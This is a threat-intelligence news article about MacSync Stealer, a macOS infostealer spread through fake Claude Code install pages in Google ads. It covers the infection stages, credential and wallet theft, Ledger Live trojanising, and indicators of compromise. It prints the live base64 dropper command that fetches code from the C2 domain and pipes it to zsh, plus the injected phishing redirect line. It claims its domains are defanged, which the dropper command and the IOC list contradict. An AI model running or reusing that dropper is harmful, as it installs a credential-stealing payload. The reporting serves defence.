GBHackers

MacSync Stealer Hijacks macOS via Fake Claude Code Google Ads


MacSync Stealer is a newly discovered macOS infostealer actively distributed through a sophisticated malvertising campaign on Google Ads that impersonates Anthropic’s Claude Code CLI.

Security researchers from Beezlebub have uncovered the complete attack chain, revealing a multi-stage infection process that spans from social engineering to deep system compromise, credential harvesting, and persistent hijacking of crypto wallets.

Attack Chain Overview (Source: beelzebub)

MacSync Stealer Hijacks macOS

The campaign begins with a sponsored Google advertisement targeting developer-centric queries such as “claude code mac install.” Victims are redirected to a malicious Google Sites page that mimics a legitimate installation portal.

built to mimic the real Anthropic website (Source: Beelzebub)
built to mimic the real Anthropic website (Source: Beelzebub)

This lure abuses trust in Google’s infrastructure and evades automated scanners by dynamically rendering content via JavaScript. The page instructs users to execute a seemingly harmless terminal command, a technique aligned with the “InstallFix” social engineering pattern commonly used against developers.

The initial payload is delivered through a triple-encoded zsh dropper. The command embedded on the fake site decodes into a secondary script that silently downloads additional payloads from a command-and-control (C2) server over unsecured HTTP:

echo 'ZWNobyAnVmVyaWZpY2F0aW9uIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1rZnNTTCBodHRwOi8vb2tsYWhvbWF3YXJlaG91c2luZy5jb20vY3VybC9iZDM0OGE0MDI2MWFhMmQ5NTU2NmNjZGM0ZTZmMzA0ZmYyNWFhOTdkMzRlNWM3MTNjNzdjOTM3NTgzYWQwNGYwfHpzaA==' | base64 -D | zsh

Once executed, the dropper initiates a three-stage infection chain. Stage one retrieves a .daily payload from the C2. Stage two decodes a base64+gzip embedded script with randomized variable names to evade signature detection. Stage three executes a silent daemon that fetches the primary AppleScript-based stealer and handles data exfiltration.

step-by-step guide targeting users (Source: Beezlebub)
step-by-step guide targeting users (Source: Beezlebub)

The core payload, identified as MacSync Stealer v1.1.2 (build tag: claude1), is delivered via osascript. It begins by terminating the Terminal process to erase evidence, then deploys a fake macOS System Preferences dialog to harvest the user’s login password. The password is validated using dscl . authonly, ensuring stealth without triggering system alerts.

With valid credentials, the malware unlocks the macOS keychain. It extracts the Chrome Safe Storage key, enabling decryption of saved credentials across Chromium-based browsers. It also collects extensive data, including browser profiles, cookies, SSH keys, AWS credentials, Telegram sessions, and over 80 cryptocurrency wallet extensions.

All harvested data is staged in /tmp/sync*/ and compressed into /tmp/osalogging.zip. Exfiltration occurs in 10MB chunks via HTTP PUT requests to the C2. However, the process depends on full archive transmission due to constraints imposed by the ZIP format, meaning interrupted uploads render the stolen data unusable.

A secondary payload introduces persistence by targeting cryptocurrency applications. If Ledger Live or Ledger Wallet is installed, the malware replaces their Electron app.asar bundles with trojanized versions. A single injected line marked with a Russian comment (ВСТАВЬТЕ СЮДА) redirects the application interface to a phishing recovery flow after launch:

setTimeout(() => {

  e.loadURL("file://" + path.join(__dirname, "recovery-step-1.html"));

}, 5000);

This delayed execution ensures the application appears legitimate before prompting victims to enter their seed phrases, which are then exfiltrated to the attacker’s infrastructure.

Notably, the attack chain includes an unintended execution gate: a blocking dialog halts further actions until user interaction. If the victim reboots or interrupts execution before clicking, both exfiltration and wallet trojanization may fail, thereby limiting the attacker’s success.

Indicators of Compromise (IOCs)

  • Malware Name: MacSync Stealer v1.1.2 (claude1)
  • Dropper SHA256: bd348a40261aa2d95566ccdc4e6f304ff25aa97d34e5c713c77c937583ad04f0
  • C2 Domain: oklahomawarehousing.com
  • Key Paths: /dynamic, /gate, /curl, /ledger/live
  • API Key: 5190ef1733183a0dc63fb623357f56d6
  • Lure URL: sites.google.com/view/claud-version-0505
  • Trojanized Ledger Live SHA256: 1abf943e97356e07bde23663da544e7c106afc19827a2106361a52035737de43
  • File Artifacts: /tmp/osalogging.zip, /tmp/sync*/

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

This campaign highlights the growing effectiveness of malvertising combined with developer-targeted social engineering. By chaining credential theft with persistent wallet hijacking, MacSync Stealer demonstrates a dual-impact threat model that compromises both system access and high-value crypto assets in a single infection flow.

Interact with Cyber Threats in Windows, Linux, macOS VMs to Trigger Full Attack Chain - Analyse Malware & Phishing with ANY RUN



Source link